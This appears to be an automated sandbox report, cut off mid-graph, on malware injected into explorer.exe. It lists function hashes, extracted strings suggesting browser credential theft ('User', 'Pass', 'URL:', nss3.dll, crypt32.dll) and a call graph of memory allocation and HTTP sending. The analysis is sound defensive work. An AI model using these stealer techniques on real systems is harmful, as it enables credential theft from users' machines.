                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 123f4a67f36c5165505b48d7569673db0ef521ecebb391560b9c9a51f623451b
                                                                                                                    • Instruction ID: c8cd41f938a8589d1fbeced303638a3a6ddb5844b040eaa78bbb0875f8fc133e
                                                                                                                    • Opcode Fuzzy Hash: 123f4a67f36c5165505b48d7569673db0ef521ecebb391560b9c9a51f623451b
                                                                                                                    • Instruction Fuzzy Hash: 77418071B187454B9B9CCA6D989123A77D6E7CD304F14863EF68BC3381E934D9128B86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE7B1E2 Relevance: .1, Instructions: 145COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 123f4a67f36c5165505b48d7569673db0ef521ecebb391560b9c9a51f623451b
                                                                                                                    • Instruction ID: 9e5b5c1ed9144329e6a107f80e663da1b3848efb60c01687624f44ee9eaec0ad
                                                                                                                    • Opcode Fuzzy Hash: 123f4a67f36c5165505b48d7569673db0ef521ecebb391560b9c9a51f623451b
                                                                                                                    • Instruction Fuzzy Hash: 5741BF717187454B878CCA6D949123A77D6E7CD308F14963EFA9BD3381E934EA038B86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF75E3D Relevance: .1, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a71647dc49d58f917d3299a1ff181ae803bb95d26acfd65c509f5e17e3f4d6b7
                                                                                                                    • Instruction ID: b5b8daefbcaf1f0753387ed377ca9075765d816f337096b8fa2c14842442b248
                                                                                                                    • Opcode Fuzzy Hash: a71647dc49d58f917d3299a1ff181ae803bb95d26acfd65c509f5e17e3f4d6b7
                                                                                                                    • Instruction Fuzzy Hash: 4E41A0317287454BD75CCA2C989166AB7D6E78C304F64863EF9DBC3381DA24E9138A86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE7AE3D Relevance: .1, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a71647dc49d58f917d3299a1ff181ae803bb95d26acfd65c509f5e17e3f4d6b7
                                                                                                                    • Instruction ID: f61ced4aedc361b28a63dc44bc0723438ca0a02fed81aa14c907c60f1f0349f4
                                                                                                                    • Opcode Fuzzy Hash: a71647dc49d58f917d3299a1ff181ae803bb95d26acfd65c509f5e17e3f4d6b7
                                                                                                                    • Instruction Fuzzy Hash: 3941A2317286454BD75CCA2C989167E77D6E78C308F64963DF98BC3381DA24E9138686
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF75E42 Relevance: .1, Instructions: 126COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1b91546c540838bf33592aed71942c3a90459d600557d7112a27b79e24dc34f8
                                                                                                                    • Instruction ID: d4e841d04431be6460f0c6fb3059ba4edf5a92b1ffc3d475451f1830feaf1741
                                                                                                                    • Opcode Fuzzy Hash: 1b91546c540838bf33592aed71942c3a90459d600557d7112a27b79e24dc34f8
                                                                                                                    • Instruction Fuzzy Hash: CF31A1317287454BD75CC92C989123EB6D6E78C304F64863EF9DBC3381DA34D9138A86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE7AE42 Relevance: .1, Instructions: 126COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1b91546c540838bf33592aed71942c3a90459d600557d7112a27b79e24dc34f8
                                                                                                                    • Instruction ID: ce4905070bb3877b40e038b904141dc69e338067623e0b4299a8ab359abc5785
                                                                                                                    • Opcode Fuzzy Hash: 1b91546c540838bf33592aed71942c3a90459d600557d7112a27b79e24dc34f8
                                                                                                                    • Instruction Fuzzy Hash: A431A3317286454BD75CCA2C989123E76D6E78C308F24963EF9CFC3381D934D9138686
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF75D22 Relevance: .1, Instructions: 117COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a58c288c3d73a210faa3b2f6b46a36f5a4a02cd38cc11b6c9ad59511472fafc4
                                                                                                                    • Instruction ID: 2ffff75b56dc6ea2de146a5477bb9f42cebbd6ac969bf6e55611f5311049aa54
                                                                                                                    • Opcode Fuzzy Hash: a58c288c3d73a210faa3b2f6b46a36f5a4a02cd38cc11b6c9ad59511472fafc4
                                                                                                                    • Instruction Fuzzy Hash: 3C318F71B242454BEB4CCE2DD89137637D6E789309B24E17DDE87CA38AEA34D413CA85
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE7AD22 Relevance: .1, Instructions: 117COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7487805404.000000000DE10000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DE10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_de10000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a58c288c3d73a210faa3b2f6b46a36f5a4a02cd38cc11b6c9ad59511472fafc4
                                                                                                                    • Instruction ID: 51a34c55f3c90bf42daf054153cf11a28bacb516a27f14f3baf230e99fd969c7
                                                                                                                    • Opcode Fuzzy Hash: a58c288c3d73a210faa3b2f6b46a36f5a4a02cd38cc11b6c9ad59511472fafc4
                                                                                                                    • Instruction Fuzzy Hash: 7A317E717201054BDB4CCE29D89127637D6E78930EB24E17DDE9BCA38AEE34D813DA85
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF75963 Relevance: 56.5, Strings: 45, Instructions: 222COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 404 af75963-af75964 405 af75966-af75967 404->405 406 af7595b-af75962 404->406 407 af759c3-af75b51 405->407 408 af75969-af759bd 405->408 409 af75b53-af75b5e 407->409 408->407 409->409 410 af75b60-af75b7b 409->410 411 af75b81-af75b9a 410->411 412 af75c0e-af75c12 410->412 413 af75ba2-af75c04 411->413 414 af75c34-af75c38 412->414 415 af75c14-af75c31 412->415 413->413 416 af75c06-af75c07 413->416 417 af75c5b-af75c5f 414->417 418 af75c3a-af75c58 414->418 415->414 416->412 419 af75c61-af75c79 417->419 420 af75c7c-af75c95 417->420 418->417 419->420
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                    • API String ID: 0-3558027158
                                                                                                                    • Opcode ID: 42052cd770641b4b2871bd9b65256d9aedbb6166974ed8162bc53a0a00dd7ca2
                                                                                                                    • Instruction ID: ae692861fbfb1c0506855df59c58d2e97ab14892e8098150c992c760389a5977
                                                                                                                    • Opcode Fuzzy Hash: 42052cd770641b4b2871bd9b65256d9aedbb6166974ed8162bc53a0a00dd7ca2
                                                                                                                    • Instruction Fuzzy Hash: 83913FF04083988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89458B85
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF75972 Relevance: 56.5, Strings: 45, Instructions: 209COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 438 af75972-af75b51 439 af75b53-af75b5e 438->439 439->439 440 af75b60-af75b7b 439->440 441 af75b81-af75b9a 440->441 442 af75c0e-af75c12 440->442 443 af75ba2-af75c04 441->443 444 af75c34-af75c38 442->444 445 af75c14-af75c31 442->445 443->443 446 af75c06-af75c07 443->446 447 af75c5b-af75c5f 444->447 448 af75c3a-af75c58 444->448 445->444 446->442 449 af75c61-af75c79 447->449 450 af75c7c-af75c95 447->450 448->447 449->450
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                    • API String ID: 0-3558027158
                                                                                                                    • Opcode ID: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
                                                                                                                    • Instruction ID: 24f7d38e1bf025fa23a9a5a09d79007903858ff46c057c7ec11c5a9846411d7c
                                                                                                                    • Opcode Fuzzy Hash: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
                                                                                                                    • Instruction Fuzzy Hash: C9913FF04483988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF71A62 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                    • API String ID: 0-1539916866
                                                                                                                    • Opcode ID: 82de502fd61a5a5f276cf9a98f5a6927eb9f18ce955e24d2ed65cc9cfe59e46a
                                                                                                                    • Instruction ID: c3a82391ee18853f09da87347f90a5db2843d3284f740a70b38a0b80dcb46cb7
                                                                                                                    • Opcode Fuzzy Hash: 82de502fd61a5a5f276cf9a98f5a6927eb9f18ce955e24d2ed65cc9cfe59e46a
                                                                                                                    • Instruction Fuzzy Hash: CE41B370A18B088FDB24DF8CA8456BEBBE6FB48700F40035ED409D7255DBB59D498BD6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF72E52 Relevance: 9.0, Strings: 7, Instructions: 292COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                    • API String ID: 0-2058692283
                                                                                                                    • Opcode ID: 5519159a7eb927e7a30bf08db4b998a67a918229e62c9f3a02a8a5a00efcd4aa
                                                                                                                    • Instruction ID: 80d11285698654165b3d6ef276d5967ece2779e18a93591518d1899176035e6b
                                                                                                                    • Opcode Fuzzy Hash: 5519159a7eb927e7a30bf08db4b998a67a918229e62c9f3a02a8a5a00efcd4aa
                                                                                                                    • Instruction Fuzzy Hash: 1391A070A1874C8BDB19EF68D4847EEB7E2FF88304F40462ED48AD7242EF7495468B85
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF72E51 Relevance: 9.0, Strings: 7, Instructions: 292COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                    • API String ID: 0-2058692283
                                                                                                                    • Opcode ID: 197dba0f86fa3bdd3a3a86e06e2aa5b9f6c337e712d45997810d0bf8f1124235
                                                                                                                    • Instruction ID: f452d747735027ee15a5a7a844096b108ea96095a8062f3df56afb76467f29ea
                                                                                                                    • Opcode Fuzzy Hash: 197dba0f86fa3bdd3a3a86e06e2aa5b9f6c337e712d45997810d0bf8f1124235
                                                                                                                    • Instruction Fuzzy Hash: 7491B370A1875C8BDB19EF68D4447EEB7E2FF88304F40462ED48AD7242DF7495468B85
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF71BE2 Relevance: 7.7, Strings: 6, Instructions: 164COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: U$b$d$k$n$o
                                                                                                                    • API String ID: 0-1739295752
                                                                                                                    • Opcode ID: 74955a8aaad671efd760620f4533aec1931296a96c06c7b4eac3c9cdecc8373a
                                                                                                                    • Instruction ID: af06a81b01436ecbc8ad3ffcb724ff853bde08260f325d955bad21bba7453ec2
                                                                                                                    • Opcode Fuzzy Hash: 74955a8aaad671efd760620f4533aec1931296a96c06c7b4eac3c9cdecc8373a
                                                                                                                    • Instruction Fuzzy Hash: 39517B30A14B099BDB58EFA4D8846EEB3B1FF58301F40462AC41AD7241EF74AA598BC5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF731B2 Relevance: 6.5, Strings: 5, Instructions: 209COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .dll$cryp$dll$nss3$t32.
                                                                                                                    • API String ID: 0-1478216402
                                                                                                                    • Opcode ID: 8609eb5a441fcefaf24165689eb878417b655a2918c4a7702fa8d20499e65246
                                                                                                                    • Instruction ID: 50ca3fbaec8feda109943ceef1a7983766c244917b4ff9dac06eade777ac6110
                                                                                                                    • Opcode Fuzzy Hash: 8609eb5a441fcefaf24165689eb878417b655a2918c4a7702fa8d20499e65246
                                                                                                                    • Instruction Fuzzy Hash: 64716E70A28B199FDBA9EF68C4487DEB3E1FF18700F81462AD84AC7244DB749554CB86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF707D8 Relevance: 6.4, Strings: 5, Instructions: 192COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                    • API String ID: 0-1970020201
                                                                                                                    • Opcode ID: 07b590ccc9b4a08ee4f8546c1cc3c7948d35cbfafea47fa85543680811544d1b
                                                                                                                    • Instruction ID: efa701a2835f1c38899061d98cad1c960e276e90a2bc9604a940b27f0c933ab1
                                                                                                                    • Opcode Fuzzy Hash: 07b590ccc9b4a08ee4f8546c1cc3c7948d35cbfafea47fa85543680811544d1b
                                                                                                                    • Instruction Fuzzy Hash: F1615C70914B4C8BDB54EFA8C485AEEB7E1FF58300F804A2ED49AD7255EF3095518B89
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF707E2 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                    • API String ID: 0-1970020201
                                                                                                                    • Opcode ID: 3412dbf14dd2fb68924d28097851181e3066ee4b83f277180f4072a73eeb5412
                                                                                                                    • Instruction ID: d6a50b2b1e599eac6aeb470dc83da0f5e14252823414ec6a141ac2ff8abc2a8c
                                                                                                                    • Opcode Fuzzy Hash: 3412dbf14dd2fb68924d28097851181e3066ee4b83f277180f4072a73eeb5412
                                                                                                                    • Instruction Fuzzy Hash: 54614B70918B4C8BDB54EFA8C444AEEB7E1FF58300F804A2ED49BE7255EF3095518B89
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF73452 Relevance: 6.4, Strings: 5, Instructions: 104COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: -Age$User$nt: $on.d$urlm
                                                                                                                    • API String ID: 0-1987325725
                                                                                                                    • Opcode ID: 643ce90686be2a6d25da55d7c2a168e17e2a139069be50c95b7cfc66e0d0a4da
                                                                                                                    • Instruction ID: 41b0b95d8bca778c3957a845be399e4d330a8d5d3e9366e9954fa28296e795c4
                                                                                                                    • Opcode Fuzzy Hash: 643ce90686be2a6d25da55d7c2a168e17e2a139069be50c95b7cfc66e0d0a4da
                                                                                                                    • Instruction Fuzzy Hash: C131D431A14B5C8BCF55EFA8C8847EEB7E1FF58204F40422BD45ED7241EE788A458B85
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0AF70FF2 Relevance: 5.1, Strings: 4, Instructions: 145COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.7471102652.000000000AF40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0AF40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_af40000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .dll$el32$h$kern
                                                                                                                    • API String ID: 0-4264704552
                                                                                                                    • Opcode ID: 91b9b89ae06d4096e3e6789263f513784e9e274d86d10fbae88bdad4899bee2f
                                                                                                                    • Instruction ID: 5b0f33c4ffb208baf6c7a23c21cc0b4a966a0adaeb47341e19688c52a9db8dfe
                                                                                                                    • Opcode Fuzzy Hash: 91b9b89ae06d4096e3e6789263f513784e9e274d86d10fbae88bdad4899bee2f
                                                                                                                    • Instruction Fuzzy Hash: 4E417470A08B498FD7A8DF6884843AEB7E1FBA8300F10476F948AC7266DF70C549CB45
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:3.6%
                                                                                                                    Dynamic/Decrypted Code Coverage:2%
                                                                                                                    Signature Coverage:2.1%
                                                                                                                    Total number of Nodes:864
                                                                                                                    Total number of Limit Nodes:116
                                                                                                                    execution_graph 73827 50196f0 73828 5019715 73827->73828 73833 501b130 73828->73833 73830 5019748 73832 501976d 73830->73832 73838 501cce0 73830->73838 73835 501b154 73833->73835 73834 501b15b 73834->73830 73835->73834 73836 501b190 LdrLoadDll 73835->73836 73837 501b1a7 73835->73837 73836->73837 73837->73830 73839 501cd0c 73838->73839 73840 501cd2c 73839->73840 73845 502c650 73839->73845 73840->73832 73842 501cd4f 73842->73840 73849 502c8c0 73842->73849 73844 501cd8a 73844->73832 73846 502c66c 73845->73846 73852 5892bc0 LdrInitializeThunk 73846->73852 73847 502c687 73847->73842 73853 502d400 73849->73853 73851 502c8dc NtClose 73851->73844 73852->73847 73854 502d40f 73853->73854 73854->73851 73855 502b4e0 73864 502e2b0 73855->73864 73857 502b616 73858 502b51b 73858->73857 73859 501b130 LdrLoadDll 73858->73859 73861 502b55b 73859->73861 73860 502b590 Sleep 73860->73861 73861->73857 73861->73860 73867 502b150 73861->73867 73875 502b330 InternetOpenA InternetConnectA HttpSendRequestA 73861->73875 73876 502c970 73864->73876 73866 502e2dd 73866->73858 73868 502b176 73867->73868 73869 502b209 73868->73869 73871 502b1c8 73868->73871 73879 502cdd0 73868->73879 73874 502b23c 73869->73874 73887 502cf40 73869->73887 73871->73874 73883 502ce40 73871->73883 73874->73861 73875->73861 73877 502d400 73876->73877 73878 502c98c NtAllocateVirtualMemory 73877->73878 73878->73866 73880 502ce0d 73879->73880 73881 502ce31 73880->73881 73882 502ce16 InternetOpenA 73880->73882 73881->73871 73882->73871 73884 502ce82 73883->73884 73885 502ceb2 73884->73885 73886 502ce8b InternetConnectA 73884->73886 73885->73869 73886->73869 73888 502cf82 73887->73888 73889 502cfa6 73888->73889 73890 502cf8b HttpSendRequestA 73888->73890 73889->73874 73890->73874 73891 501ea87 73892 501ea8d 73891->73892 73894 501eb07 73891->73894 73893 501eb1c 73894->73893 73896 5027390 73894->73896 73897 50273a4 73896->73897 73902 50274c2 73896->73902 73898 50274d5 73897->73898 73899 50274b8 73897->73899 73897->73902 73928 502c790 73898->73928 73925 502c890 73899->73925 73902->73893 73903 50274fc 73931 502e330 73903->73931 73906 5027697 73907 502c8c0 NtClose 73906->73907 73909 502769e 73907->73909 73908 50276ad 73976 50270c0 73908->73976 73909->73893 73911 50276c0 73911->73893 73912 50275a0 73913 5027607 73912->73913 73914 50275af 73912->73914 73913->73906 73919 502761a 73913->73919 73915 50275b4 73914->73915 73916 50275e5 73914->73916 73917 50275cd 73914->73917 73915->73893 73916->73909 73944 5026d40 73916->73944 73934 5027020 73917->73934 73923 502c8c0 NtClose 73919->73923 73920 50275db 73920->73893 73922 50275fd 73922->73893 73924 5027686 73923->73924 73924->73893 73926 502d400 73925->73926 73927 502c8ac NtDeleteFile 73926->73927 73927->73902 73929 502d400 73928->73929 73930 502c7ac NtCreateFile 73929->73930 73930->73903 73932 5027508 73931->73932 74013 502caa0 73931->74013 73932->73902 73932->73906 73932->73908 73932->73912 73935 502703c 73934->73935 73936 5027064 73935->73936 73937 5027078 73935->73937 73938 502c8c0 NtClose 73936->73938 73939 502c8c0 NtClose 73937->73939 73940 502706d 73938->73940 73941 5027081 73939->73941 73940->73920 74016 502e450 73941->74016 73943 502708c 73943->73920 73945 5026d8b 73944->73945 73946 5026dbe 73944->73946 73948 502c8c0 NtClose 73945->73948 73947 5026f09 73946->73947 73950 5026dda 73946->73950 73956 502c8c0 NtClose 73947->73956 73949 5026daf 73948->73949 73949->73922 73951 5026e11 73950->73951 73952 5026dfc 73950->73952 73954 5026e16 73951->73954 73955 5026e2c 73951->73955 73953 502c8c0 NtClose 73952->73953 73957 5026e05 73953->73957 73958 502c8c0 NtClose 73954->73958 73963 5026e31 73955->73963 74022 502e410 73955->74022 73959 5026f69 73956->73959 73957->73922 73960 5026e1f 73958->73960 73959->73922 73960->73922 73970 5026e43 73963->73970 74025 502c840 73963->74025 73964 5026e97 73965 5026eb5 73964->73965 73966 5026eca 73964->73966 73968 502c8c0 NtClose 73965->73968 73967 502c8c0 NtClose 73966->73967 73969 5026ed3 73967->73969 73968->73970 73971 5026eff 73969->73971 74028 502e130 73969->74028 73970->73922 73971->73922 73973 5026eea 73974 502e330 RtlFreeHeap 73973->73974 73975 5026ef3 73974->73975 73975->73922 73977 50270fe 73976->73977 73978 5027107 73977->73978 73979 502711c 73977->73979 73980 502c8c0 NtClose 73978->73980 73981 5027140 73979->73981 73982 5027187 73979->73982 73995 5027110 73980->73995 73985 502c7f0 LdrInitializeThunk 73981->73985 73983 50271c9 73982->73983 73984 502718c 73982->73984 73988 50271db 73983->73988 73994 502734a 73983->73994 73987 502c840 NtReadFile 73984->73987 73984->73995 73986 5027162 73985->73986 73989 502c8c0 NtClose 73986->73989 73990 50271b3 73987->73990 73991 50271e0 73988->73991 74001 5027218 73988->74001 73989->73995 73992 502c8c0 NtClose 73990->73992 73993 502c7f0 LdrInitializeThunk 73991->73993 73996 50271bc 73992->73996 73997 5027200 73993->73997 73994->73995 73998 502c8c0 NtClose 73994->73998 73995->73911 73996->73911 74002 502c8c0 NtClose 73997->74002 73999 502737b 73998->73999 73999->73911 74000 502721d 74000->73995 74003 502c7f0 LdrInitializeThunk 74000->74003 74001->74000 74008 50272f6 74001->74008 74004 5027209 74002->74004 74005 5027240 74003->74005 74004->73911 74006 502c8c0 NtClose 74005->74006 74007 502724b 74006->74007 74007->73911 74008->73995 74033 502c7f0 74008->74033 74011 502c8c0 NtClose 74012 502733b 74011->74012 74012->73911 74014 